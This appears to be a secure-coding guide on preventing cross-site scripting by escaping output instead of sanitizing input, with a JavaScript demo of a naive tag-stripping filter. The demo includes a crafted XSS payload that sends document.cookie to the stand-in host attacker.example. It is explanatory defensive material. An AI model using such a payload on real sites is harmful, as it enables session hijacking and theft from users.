
Don’t try to sanitize input, escape output (2020)


Why you should escape output correctly, but generally not sanitize user input.

A website is vulnerable to cross-site scripting (XSS) if it takes information a user enters and repeats it back verbatim in a page’s HTML. The consequences range from minor (HTML that breaks the page layout) to serious (JavaScript that sends the user’s login cookie to an attacker’s site). The fix is to escape the value for the context it is written into, HTML in this case, at the point of output, rather than trying to strip dangerous characters out of the input when it arrives. A separate case is input that is meant to be SQL, such as a user-supplied query: there you’re best off using a proper SQL parser (like this one) to ensure it’s a well-formed SELECT query, but doing this correctly is not trivial, so be sure to get a security review.
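The following is an added example, not code from the original article, contrasting the two approaches for the XSS case above. It uses a deliberately naive input “sanitizer” that strips `<script>` tags, a context-aware HTML escaper applied at output time, and a constructed attacker payload; the names (`naiveSanitize`, `escapeHtml`, `renderUnsafe`, `renderSafe`) and the `attacker.example` host are assumptions made for the illustration.

```javascript
// Added example (not from the original article): why stripping "bad" input is
// fragile, and how escaping at the point of output closes the hole.

// Naive input sanitizer: deletes <script> and </script> tags from the input.
// Shown only to demonstrate the failure mode; do not use this as a defense.
function naiveSanitize(input) {
  return input.replace(/<\/?script>/gi, "");
}

// Output escaping for HTML text and double-quoted attribute values: the five
// characters that can change the meaning of the markup are replaced with
// entities, so whatever the user typed is rendered as literal text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: repeats the user's value back verbatim into the page's HTML.
function renderUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Hardened: same page, but the value is escaped as it is written into HTML.
function renderSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// True if the rendered HTML still contains a live <script> tag, i.e. the
// attacker's payload survived into the page as markup rather than text.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attack payload (assumed attacker host): a nested tag that
// re-forms into <script> after one pass of the naive sanitizer.
const payload =
  '<scr<script>ipt>document.location="https://attacker.example/?c="+document.cookie</script>';

// Run both strategies against the payload and report whether the script
// tag made it into the page.
function demo() {
  const sanitizedThenRendered = renderUnsafe(naiveSanitize(payload));
  const escapedAtOutput = renderSafe(payload);
  return {
    sanitizeInputStillVulnerable: containsScriptTag(sanitizedThenRendered),
    escapeOutputSafe: !containsScriptTag(escapedAtOutput),
    sanitizedThenRendered,
    escapedAtOutput,
  };
}

console.log(demo());
```

Note that `escapeHtml` is correct only for HTML text and quoted attribute values; a value written into a URL, a `<script>` block or a CSS declaration needs the escaping rules of that context, which is the point of escaping at output time, where the context is known.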

